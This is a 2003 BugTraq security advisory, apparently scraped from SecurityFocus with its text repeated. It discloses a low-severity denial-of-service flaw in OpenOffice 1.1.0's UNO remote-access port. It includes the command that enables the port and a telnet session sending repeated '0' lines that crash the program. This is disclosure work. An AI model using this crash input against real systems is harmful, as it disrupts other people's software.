BugTraq
Back to list
|
Post reply
Openoffice 1.1.0 DoS
Oct 08 2003 11:15AM
Marc Schoenefeld (schonef uni-muenster de)
================================
Illegalaccess.org Security Alert
================================
Date : 08/10/2003
Application : Openoffice
Version : 1.1.0
Website : http://www.Openoffice.org
Problems : Desktop Denial-Of-Service
Severity : Low
Contributor : Marc Schoenefeld, marc (at) org (dot) ille [email concealed]galaccess
When enabling remote access (UNO) to OpenOffice,
it opens a port (default 8100). This is done typically with
the following command:
C:\Programme\oo1.1.0\program> soffice
"-accept=socket,host=<ip>,port=8100;urp;"
where <ip> states the listening address
When issuing the commands listed below, Openoffice crashes and
prompts the error reporting box.
===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0
===================================================================
--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Illegalaccess.org Security Alert
================================
Date : 08/10/2003
Application : Openoffice
Version : 1.1.0
Website : http://www.Openoffice.org
Problems : Desktop Denial-Of-Service
Severity : Low
Contributor : Marc Schoenefeld, marc (at) org (dot) ille [email concealed]galaccess
When enabling remote access (UNO) to OpenOffice,
it opens a port (default 8100). This is done typically with
the following command:
C:\Programme\oo1.1.0\program> soffice
"-accept=socket,host=<ip>,port=8100;urp;"
where <ip> states the listening address
When issuing the commands listed below, Openoffice crashes and
prompts the error reporting box.
===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0
===================================================================
--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ reply ]